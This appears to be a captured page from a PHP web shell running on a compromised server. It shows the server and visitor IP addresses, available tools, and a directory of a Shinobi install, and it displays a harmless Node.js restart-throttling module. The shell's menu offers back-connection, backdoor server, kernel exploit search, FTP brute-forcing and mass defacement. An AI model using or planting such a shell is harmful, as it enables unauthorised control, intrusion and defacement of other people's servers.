IP Address: 80.252.133.24:443 You: 216.73.216.93
| |||||||||||||||||||
|
| ||||||||||||||||||
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON | |||||||||||||||||||
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, | |||||||||||||||||||
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ] |
|||||||||||||||||||
| |||||||||||||||||||
/ distr/ Shinobi/ plugins/ - drwxr-xr-x |
Viewing file:
Select action/file-type: const fs = require('fs'); const haltMessage = `This script has stopped and started too quickly. It has been suspended to prevent performance issues.` const lastStartTimeLocation = `${process.cwd()}/lastStartTime.txt` const timeStarted = `${(new Date()).getTime()}` const setStartTime = () => { fs.writeFileSync(lastStartTimeLocation,timeStarted,'utf8') } const checkStartTime = () => { //is it too soon? if too soon, the script might be crashing. in which case it will be suspended and may appear to be "running" but will not operate. try{ const lastTimeStarted = parseInt(fs.readFileSync(lastStartTimeLocation,'utf8')) if(lastTimeStarted < timeStarted - 3000){ return true } }catch(err){ return true } return false } module.exports = { haltMessage: haltMessage, setStartTime: setStartTime, checkStartTime: checkStartTime, } |
Command: | |
Quick Commands: | |
Upload: | |
PHP Filesystem: |
<@ Ú |
Search File: | |
Create File: | |
View File: | |
Mass Defacement: |